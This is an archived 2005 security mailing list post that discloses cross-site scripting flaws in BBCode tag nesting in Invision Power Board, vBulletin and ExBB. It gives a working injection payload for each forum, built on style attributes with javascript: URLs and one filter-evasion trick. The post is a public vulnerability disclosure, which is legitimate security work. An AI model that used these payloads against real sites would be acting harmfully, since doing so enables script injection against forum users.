lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <S3375385AbVAONPL/20050115131525Z+110@mail.yandex.ru>
Date: Sat, 15 Jan 2005 16:13:38 +0300
From: "pigrelax" <pigrelax@...dex.ru>
To: <bugtraq@...urityfocus.com>, <full-disclosure@...ts.netsys.com>
Subject: XSS in the nested BB tag in  many forum


XSS was found in the nested BB tag in many forum:

Invision Power Board:
[COLOR=[IMG]http://aaa.aa/=`aaa.jpg[/IMG]]`
style=background:url(javascript:alert()) [/COLOR]

vBulletin
[EMAIL=[URL=s as=`s@....ew]mailto:assss@....ew] 
sssssss[/URL][/EMAIL]` style=`background:url(javaSCrip
t:alert(/Hi_from_Algol/))` (using tab between "javaSCrip" and "t")

ExBB
[color='[url]http://rerer.rew[/url]]fffff[/color]'
style=background:url(javascript:alert()); 

Other forum and other BB tag may be vulnerable. Examples above work only in
Internet Explorer.

More info - http://www.securitylab.ru/51808.html and
antichat.ru/txt/IPB/index3.php


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ